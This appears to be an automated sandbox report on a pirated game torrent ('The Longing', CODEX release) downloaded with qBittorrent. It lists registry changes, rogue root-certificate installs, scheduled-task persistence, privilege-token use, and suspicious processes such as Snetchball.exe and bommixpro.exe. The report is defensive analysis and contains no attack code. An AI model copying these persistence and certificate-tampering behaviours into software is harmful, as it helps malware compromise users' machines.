created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings qbittorrent.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell\open qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell\open\command qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.torrent\Content Type = "application/x-bittorrent" qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\magnet\ = "URL:Magnet URI" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings The Longing.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.File.Torrent\shell qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\ = "Magnet URI" qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell qbittorrent_5.0.1_x64_setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\qBittorrent.Url.Magnet\shell\open qbittorrent_5.0.1_x64_setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [certificate blob omitted] setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [certificate blob omitted] utorrent9.tmp Key created \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0 utorrent9.tmp Set value (data) \REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\SystemCertificates\CA\Certificates\C94DC4831A901A9FEC0FB49B71BD49B5AAD4FAD0\Blob = [certificate blob omitted] utorrent9.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 utorrent9.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 setup.exe -
NTFS ADS 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\PCGAMESTORRENTS.COM.url:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\README.txt:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\codex.nfo:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\codex-the.longing.iso:Zone.Identifier qbittorrent.exe File opened for modification C:\Users\Admin\Downloads\the-longing-codex_Dc3biRCmpz.zip:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\The.Longing-CODEX\IGG-GAMES.COM.url:Zone.Identifier qbittorrent.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5580 schtasks.exe 5044 schtasks.exe 3288 schtasks.exe 4556 schtasks.exe 4496 schtasks.exe 5772 schtasks.exe 5236 schtasks.exe 336 schtasks.exe 5484 schtasks.exe 5192 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
pid Process 3816 qbittorrent.exe 3080 qbittorrent.exe 712 qbittorrent.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3900 qbittorrent_5.0.1_x64_setup.exe 3900 qbittorrent_5.0.1_x64_setup.exe 3732 msedge.exe 3732 msedge.exe 3948 msedge.exe 3948 msedge.exe 4400 msedge.exe 4400 msedge.exe 1524 identity_helper.exe 1524 identity_helper.exe 1044 msedge.exe 1044 msedge.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 1172 powershell.exe 1172 powershell.exe 4216 powershell.exe 4216 powershell.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 3120 GtBtte.exe 396 Izaw0OcctowNceUeU.tmp 396 Izaw0OcctowNceUeU.tmp 1768 powershell.exe 1768 powershell.exe 1628 powershell.exe 1628 powershell.exe 4656 powershell.exe 4656 powershell.exe 4656 powershell.exe 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 4584 powershell.exe 4584 powershell.exe 4584 powershell.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 1460 bommixpro.exe 424 Snetchball.exe 424 Snetchball.exe 424 Snetchball.exe 1460 bommixpro.exe 1460 bommixpro.exe 6056 powershell.exe 6056 powershell.exe 6056 powershell.exe 4700 powershell.exe 4700 powershell.exe 4700 powershell.exe 5808 powershell.EXE 5808 powershell.EXE 5808 powershell.EXE 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 2848 Snetchball.exe 4860 Snetchball.exe 4860 Snetchball.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 712 qbittorrent.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 18 IoCs
pid Process 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 4216 powershell.exe Token: SeDebugPrivilege 1768 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 4656 powershell.exe Token: SeDebugPrivilege 4584 powershell.exe Token: SeIncreaseQuotaPrivilege 3324 WMIC.exe Token: SeSecurityPrivilege 3324 WMIC.exe Token: SeTakeOwnershipPrivilege 3324 WMIC.exe Token: SeLoadDriverPrivilege 3324 WMIC.exe Token: SeSystemProfilePrivilege 3324 WMIC.exe Token: SeSystemtimePrivilege 3324 WMIC.exe Token: SeProfSingleProcessPrivilege 3324 WMIC.exe Token: SeIncBasePriorityPrivilege 3324 WMIC.exe Token: SeCreatePagefilePrivilege 3324 WMIC.exe Token: SeBackupPrivilege 3324 WMIC.exe Token: SeRestorePrivilege 3324 WMIC.exe Token: SeShutdownPrivilege 3324 WMIC.exe Token: SeDebugPrivilege 3324 WMIC.exe Token: SeSystemEnvironmentPrivilege 3324 WMIC.exe Token: SeRemoteShutdownPrivilege 3324 WMIC.exe Token: SeUndockPrivilege 3324 WMIC.exe Token: SeManageVolumePrivilege 3324 WMIC.exe Token: 33 3324 WMIC.exe Token: 34 3324 WMIC.exe Token: 35 3324 WMIC.exe Token: 36 3324 WMIC.exe Token: SeIncreaseQuotaPrivilege 3324 WMIC.exe Token: SeSecurityPrivilege 3324 WMIC.exe Token: SeTakeOwnershipPrivilege 3324 WMIC.exe Token: SeLoadDriverPrivilege 3324 WMIC.exe Token: SeSystemProfilePrivilege 3324 WMIC.exe Token: SeSystemtimePrivilege 3324 WMIC.exe Token: SeProfSingleProcessPrivilege 3324 WMIC.exe Token: SeIncBasePriorityPrivilege 3324 WMIC.exe Token: SeCreatePagefilePrivilege 3324 WMIC.exe Token: SeBackupPrivilege 3324 WMIC.exe Token: SeRestorePrivilege 3324 WMIC.exe Token: SeShutdownPrivilege 3324 WMIC.exe Token: SeDebugPrivilege 3324 WMIC.exe Token: SeSystemEnvironmentPrivilege 3324 WMIC.exe Token: SeRemoteShutdownPrivilege 3324 WMIC.exe Token: SeUndockPrivilege 3324 WMIC.exe Token: SeManageVolumePrivilege 3324 WMIC.exe Token: 33 3324 WMIC.exe Token: 34 3324 WMIC.exe Token: 35 3324 WMIC.exe Token: 36 3324 WMIC.exe Token: 
SeDebugPrivilege 424 Snetchball.exe Token: SeDebugPrivilege 4372 Snetchball.exe Token: SeDebugPrivilege 1560 Snetchball.exe Token: SeDebugPrivilege 2752 Snetchball.exe Token: SeDebugPrivilege 4488 Snetchball.exe Token: SeDebugPrivilege 2848 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeDebugPrivilege 5472 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe Token: SeCreatePagefilePrivilege 424 Snetchball.exe Token: SeShutdownPrivilege 424 Snetchball.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 396 Izaw0OcctowNceUeU.tmp 2860 0VWXDTifa42.tmp 2860 0VWXDTifa42.tmp 1172 utorrent9.tmp 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 3732 msedge.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe 712 qbittorrent.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 444 setup.tmp 444 setup.tmp 444 setup.tmp 964 The Longing.exe 1376 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3732 wrote to memory of 3560 3732 msedge.exe 78 PID 3732 wrote to memory of 3560 3732 msedge.exe 78 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 
msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3504 3732 msedge.exe 80 PID 3732 wrote to memory of 3948 3732 msedge.exe 81 PID 3732 wrote to memory of 3948 3732 msedge.exe 81 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82 PID 3732 wrote to memory of 1560 3732 msedge.exe 82
Processes
- C:\Users\Admin\AppData\Local\Temp\qbittorrent_5.0.1_x64_setup.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\qbittorrent_5.0.1_x64_setup.exe"
  - Loads dropped DLL
  - Drops file in Program Files directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID: 3900
  - C:\Program Files\qBittorrent\qbittorrent.exe (depth 2)
    Command line: "C:\Program Files\qBittorrent\qbittorrent.exe"
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    PID: 3816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 1)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID: 3732
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffec3a53cb8,0x7ffec3a53cc8,0x7ffec3a53cd8
    PID: 3560
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1908 /prefetch:2
    PID: 3504
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
    - Suspicious behavior: EnumeratesProcesses
    PID: 3948
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:8
    PID: 1560
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
    PID: 4020
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
    PID: 1648
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4932 /prefetch:1
    PID: 2852
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4960 /prefetch:1
    PID: 1136
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1
    PID: 932
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
    PID: 2564
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:1
    PID: 2640
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
    PID: 1180
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 2)
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
    PID: 968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:12⤵PID:796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:12⤵PID:4484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:12⤵PID:4996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:12⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:12⤵PID:4148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:12⤵PID:3444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5644 /prefetch:82⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:12⤵PID:1648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:12⤵PID:1376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,11421756230785192901,8918884678569281129,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:3700
-
-
